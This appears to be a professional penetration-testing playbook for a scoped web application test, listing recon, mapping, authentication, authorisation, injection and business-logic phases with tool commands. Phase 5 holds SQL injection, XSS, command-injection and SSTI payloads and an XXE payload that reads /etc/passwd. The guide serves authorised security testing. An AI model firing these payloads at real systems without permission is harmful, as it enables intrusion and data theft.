Playbook: Web Application Penetration Test
Scope: Single web application (defined URL/domain); black-box or grey-box Prerequisites: Scope agreement; Burp Suite Pro; target URL; credentials for grey-box MITRE Coverage: T1190, T1059.007, T1552, T1078
Objective
Identify and exploit vulnerabilities in the target web application, demonstrating business impact.
Steps
Phase 1: Passive Reconnaissance
- Identify tech stack: Wappalyzer, response headers, cookies, error messages.
- Collect historical URLs:
gau https://target.com | tee urls.txt,waybackurls target.com. - Review JS files for endpoints, API keys, hardcoded secrets.
- Google dork:
site:target.com filetype:pdf inurl:admin. - Check
robots.txt,sitemap.xml,.well-known/. - Certificate transparency:
curl -s "https://crt.sh/?q=target.com&output=json" | jq '.[].name_value'.
Phase 2: Active Mapping
- Spider with Burp:
- Target → Scan → Crawl and audit (configure scope first).
- Or: Spider manually while logged in to capture authenticated endpoints.
- Directory brute-force:
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,asp,aspx,jsp,html -o fuzz.txt ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt - Parameter discovery:
# Param Miner (Burp extension) — discover hidden parameters # arjun — standalone param brute-forcer arjun -u https://target.com/api/endpoint - API enumeration: check
/api/,/v1/,/swagger.json,/api-docs,/openapi.yaml.
Phase 3: Authentication Testing
- Default credentials (admin:admin, admin:password, etc.).
- Account enumeration: compare responses for valid vs. invalid usernames.
- Password policy testing: minimum length, lockout threshold.
- Password reset flow: predictable tokens, token reuse, host header injection.
- MFA bypass: skip step, OTP reuse, response manipulation (
"success":false→"success":true). - JWT (if used):
jwt_tool <token> -t https://target.com/api/endpoint # Check: alg:none, weak secret, kid injection, jku header injection
Phase 4: Authorization Testing
- Create two accounts at same privilege level (A, B).
- Create one admin account.
- Test IDOR: capture user A’s request, change ID to user B’s resource → access?
- Test privilege escalation: access admin endpoints as regular user.
- Test HTTP method switching:
GET /admin→POST /admin,PUT /admin. - Check for BOLA/BFLA in API endpoints (OWASP API Security Top 10).
Phase 5: Injection Testing
- SQLi — every parameter:
# Manual: ', ", \, ') -- - # Automated: sqlmap -u "https://target.com/page?id=1" --dbs --batch sqlmap -r request.txt --level=3 --risk=2 --batch - XSS — every reflected parameter:
<script>alert(document.domain)</script> <img src=x onerror=alert(1)> "><svg onload=alert(1)> - Command injection:
; id,| id,`id`,$(id),%0aid. - SSTI: ``,
${7*7},<%= 7*7 %>— look for49in response. - XXE (XML inputs):
<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test> - SSRF: submit URLs in parameters → check for internal service responses. Use Collaborator for blind SSRF.
Phase 6: Business Logic
- Price manipulation: tamper with quantity/price in purchase requests.
- Workflow skip: jump directly to later step in multi-step process.
- Race conditions: parallel requests for one-time-use resources.
- File upload: upload
.php,.aspx,.jsp— bypass extension checks.
Phase 7: Supplementary Automated Scan
nuclei -u https://target.com -severity critical,high -o nuclei.txt
nikto -h https://target.com -output nikto.txt
Cleanup / Deconfliction
- Remove any uploaded test files.
- Delete any test accounts created.
- Report critical findings to client immediately (RCE, SQLi with sensitive data).
Notes & Gotchas
- Burp active scanner complements manual testing but misses logic flaws — don’t rely on it alone.
- API endpoints often have different (weaker) auth than UI — test both.
- GraphQL: introspect schema (
__schema), check for batching attacks, authorization on mutations. - Test on staging if available; get explicit sign-off before testing production databases.